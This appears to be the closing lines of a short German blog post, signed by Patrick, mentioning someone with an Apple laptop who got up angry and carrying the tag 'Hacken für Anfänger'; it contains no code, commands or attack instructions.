Wut aufgestanden. In dem Fall wars der mit dem Apple Laptop.

Bis die Tage liebe Fans

MFG Patrick

Tags:

Hacken für Anfänger